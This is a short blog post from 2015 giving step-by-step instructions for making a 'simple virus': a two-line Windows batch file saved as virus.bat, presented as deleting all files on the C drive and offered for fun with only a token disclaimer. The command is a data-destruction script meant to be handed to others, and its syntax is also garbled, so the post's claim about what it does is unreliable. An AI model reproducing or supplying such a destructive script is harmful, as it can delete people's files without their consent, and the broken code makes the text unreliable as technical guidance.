How to create a simple virus to delete all C drive files.

Monday, December 28, 2015

Want to make a simple virus on your computer ? In this article I will show you how making a simple virus by following steps:

Step-1:

Just open notepad ( Winkey+R - run - type notepad and hit enter) or any text editor.

Step-2:

Now copy and paste the following code below into the notepad.

@Echo off
Del C:\ *.* |y

Step-3:

Now save it as virus.bat ( where,  virus is a file name and “. bat” is the file extension ).

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Have fun.. :D

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...
 
Techy Cloud © 2013. Designed By Cloud Blogs.